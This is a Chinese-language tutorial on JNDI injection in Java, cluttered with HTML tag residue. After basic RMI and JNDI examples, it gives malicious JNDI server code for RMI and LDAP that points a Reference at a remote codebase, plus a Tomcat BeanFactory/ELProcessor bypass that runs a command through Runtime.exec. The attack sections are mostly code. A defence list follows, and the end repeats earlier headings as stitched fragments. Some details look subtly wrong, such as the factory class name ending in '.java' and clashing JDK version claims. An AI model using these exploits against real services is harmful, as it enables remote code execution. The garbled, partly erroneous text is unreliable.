JNDI注入安全漏洞详解<\/h1>

1. JNDI基础概念<\/h2>
JNDI (Java Naming and Directory Interface) 是Java提供的一个API，核心思想是通过名称映射到对象，实现资源的查找和访问。<\/p>

1.1 JNDI与RMI结合<\/h3>

JNDI可以通过RMI (Remote Method Invocation) 查找远程服务，以下是基本实现示例：<\/p>

远程接口定义<\/strong>：<\/p>

import<\/span> java.rmi.Remote;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> interface<\/span> IRemoteObj<\/span> extends<\/span> Remote {<\/span>
<\/span><\/span>    public<\/span> String sayHello<\/span>(<\/span>String keywords)<\/span> throws<\/span> RemoteException;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>接口实现类<\/strong>：<\/p>
import<\/span> java.io.Serializable;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> RemoteObjImpl<\/span> implements<\/span> IRemoteObj,<\/span> Serializable {<\/span>
<\/span><\/span>    @Override<\/span>
<\/span><\/span>    public<\/span> String sayHello<\/span>(<\/span>String keywords)<\/span> throws<\/span> RemoteException {<\/span>
<\/span><\/span>        return<\/span> "hello "<\/span> +<\/span> keywords;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>RMI服务器端<\/strong>：<\/p>
import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> RmiServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        final<\/span> RemoteObjImpl remoteObj =<\/span> new<\/span> RemoteObjImpl();<\/span>
<\/span><\/span>        final<\/span> Registry registry =<\/span> LocateRegistry.<\/span>createRegistry<\/span>(<\/span>1099<\/span>);<\/span>
<\/span><\/span>        registry.<\/span>bind<\/span>(<\/span>"remoteObj"<\/span>,<\/span> remoteObj);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 保持服务器运行
<\/span><\/span><\/span><\/span>        while<\/span> (<\/span>true<\/span>)<\/span> {}<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>RMI客户端<\/strong>：<\/p>
import<\/span> java.rmi.registry.LocateRegistry;<\/span>
<\/span><\/span>import<\/span> java.rmi.registry.Registry;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> RmiClient<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        final<\/span> Registry registry =<\/span> LocateRegistry.<\/span>getRegistry<\/span>(<\/span>"127.0.0.1"<\/span>,<\/span> 1099<\/span>);<\/span>
<\/span><\/span>        final<\/span> IRemoteObj remoteObj =<\/span> (<\/span>IRemoteObj)<\/span>registry.<\/span>lookup<\/span>(<\/span>"remoteObj"<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>remoteObj.<\/span>sayHello<\/span>(<\/span>"hello"<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>1.2 JNDI服务绑定RMI<\/h3>
JNDI服务端<\/strong>：<\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIRMIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException,<\/span> RemoteException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        initialContext.<\/span>rebind<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteObj"<\/span>,<\/span> new<\/span> RemoteObjImpl());<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>JNDI客户端<\/strong>：<\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIRMIClient<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException,<\/span> RemoteException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        final<\/span> IRemoteObj remoteObj =<\/span> (<\/span>IRemoteObj)<\/span>initialContext.<\/span>lookup<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteObj"<\/span>);<\/span>
<\/span><\/span>        System.<\/span>out<\/span>.<\/span>println<\/span>(<\/span>remoteObj.<\/span>sayHello<\/span>(<\/span>"hello"<\/span>));<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. JNDI注入漏洞原理<\/h2>
当JNDI客户端的lookup()<\/code>方法参数可控时，攻击者可以构造恶意RMI或LDAP地址，导致远程代码执行。<\/p>
2.1 基本攻击方式<\/h3>
恶意JNDI服务端<\/strong>：<\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> javax.naming.Reference;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDIRMIServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException,<\/span> RemoteException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        final<\/span> Reference reference =<\/span> new<\/span> Reference(<\/span>"evil"<\/span>,<\/span> "evil"<\/span>,<\/span> "http:\/\/localhost:8081\/"<\/span>);<\/span>
<\/span><\/span>        initialContext.<\/span>rebind<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteObj"<\/span>,<\/span> reference);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>当客户端访问该RMI服务时，会自动加载恶意引用对象，从指定URL下载并执行恶意代码。<\/p>
2.2 LDAP协议绕过(JDK 8u191之前)<\/h3>
在JDK 8u191之前，LDAP协议也可用于JNDI注入攻击：<\/p>
LDAP服务端<\/strong>：<\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> javax.naming.Reference;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDILDAPServer<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        final<\/span> Reference reference =<\/span> new<\/span> Reference(<\/span>"evil"<\/span>,<\/span> "evil"<\/span>,<\/span> "http:\/\/localhost:8081\/"<\/span>);<\/span>
<\/span><\/span>        initialContext.<\/span>rebind<\/span>(<\/span>"ldap:\/\/localhost:10389\/cn=test,dc=example,dc=com"<\/span>,<\/span> reference);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>LDAP客户端<\/strong>：<\/p>
import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> java.rmi.RemoteException;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDILDAPClient<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException,<\/span> RemoteException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        initialContext.<\/span>lookup<\/span>(<\/span>"ldap:\/\/localhost:10389\/cn=test,dc=example,dc=com"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>3. 高版本JDK绕过技术(8u251+)<\/h2>
高版本JDK限制了远程RMI和LDAP的访问，但仍有绕过方法：<\/p>
3.1 使用Tomcat的BeanFactory<\/h3>
利用Tomcat自带的BeanFactory<\/code>类中的getObjectInstance<\/code>方法，通过EL表达式执行命令：<\/p>
绕过示例<\/strong>：<\/p>
import<\/span> org.apache.naming.ResourceRef;<\/span>
<\/span><\/span>import<\/span> javax.naming.InitialContext;<\/span>
<\/span><\/span>import<\/span> javax.naming.NamingException;<\/span>
<\/span><\/span>import<\/span> javax.naming.StringRefAddr;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> JNDILDAPServerBypass<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> NamingException {<\/span>
<\/span><\/span>        final<\/span> InitialContext initialContext =<\/span> new<\/span> InitialContext();<\/span>
<\/span><\/span>        final<\/span> ResourceRef resourceRef =<\/span> new<\/span> ResourceRef(<\/span>
<\/span><\/span>            "javax.el.ELProcessor"<\/span>,<\/span> 
<\/span><\/span>            null<\/span>,<\/span>
<\/span><\/span>            true<\/span>,<\/span> 
<\/span><\/span>            "org.apache.naming.factory.BeanFactory.java"<\/span>,<\/span> 
<\/span><\/span>            null<\/span>
<\/span><\/span>        );<\/span>
<\/span><\/span>        
<\/span><\/span>        resourceRef.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"forceString"<\/span>,<\/span> "x=eval"<\/span>));<\/span>
<\/span><\/span>        resourceRef.<\/span>add<\/span>(<\/span>new<\/span> StringRefAddr(<\/span>"x"<\/span>,<\/span> "Runtime.getRuntime().exec('calc')"<\/span>));<\/span>
<\/span><\/span>        
<\/span><\/span>        initialContext.<\/span>bind<\/span>(<\/span>"rmi:\/\/localhost:1099\/remoteObj"<\/span>,<\/span> resourceRef);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 防御措施<\/h2>

升级JDK<\/strong>：使用JDK 8u191及以上版本，限制JNDI远程访问<\/li>
输入验证<\/strong>：严格校验lookup()<\/code>方法的参数，禁止用户控制JNDI查找地址<\/li>
安全配置<\/strong>：

设置com.sun.jndi.rmi.object.trustURLCodebase=false<\/code><\/li>
设置com.sun.jndi.cosnaming.object.trustURLCodebase=false<\/code><\/li>
<\/ul>
<\/li>
代码审计<\/strong>：检查所有使用JNDI查找的代码，确保参数不可控<\/li>
使用白名单<\/strong>：限制JNDI只能访问可信的命名和目录服务<\/li>
<\/ol>
5. 漏洞利用场景<\/h2>

反序列化漏洞中的JNDI注入<\/li>
日志框架中的JNDI查找（如Log4j漏洞）<\/li>
动态加载外部资源的应用<\/li>
使用JNDI查找LDAP\/RMI服务的应用<\/li>
<\/ol>
通过深入理解JNDI工作机制和注入原理，可以更好地防御此类安全漏洞。<\/p>

JNDI注入安全漏洞详解<\/h1>

1. JNDI基础概念<\/h2> JNDI (Java Naming and Directory Interface) 是Java提供的一个API，核心思想是通过名称映射到对象，实现资源的查找和访问。<\/p>

2. JNDI注入漏洞原理<\/h2> 当JNDI客户端的lookup()<\/code>方法参数可控时，攻击者可以构造恶意RMI或LDAP地址，导致远程代码执行。<\/p>

3. 高版本JDK绕过技术(8u251+)<\/h2> 高版本JDK限制了远程RMI和LDAP的访问，但仍有绕过方法：<\/p>

1. JNDI基础概念<\/h2>
JNDI (Java Naming and Directory Interface) 是Java提供的一个API，核心思想是通过名称映射到对象，实现资源的查找和访问。<\/p>

2. JNDI注入漏洞原理<\/h2>
当JNDI客户端的`lookup()<\/code>方法参数可控时，攻击者可以构造恶意RMI或LDAP地址，导致远程代码执行。<\/p>`

3. 高版本JDK绕过技术(8u251+)<\/h2>
高版本JDK限制了远程RMI和LDAP的访问，但仍有绕过方法：<\/p>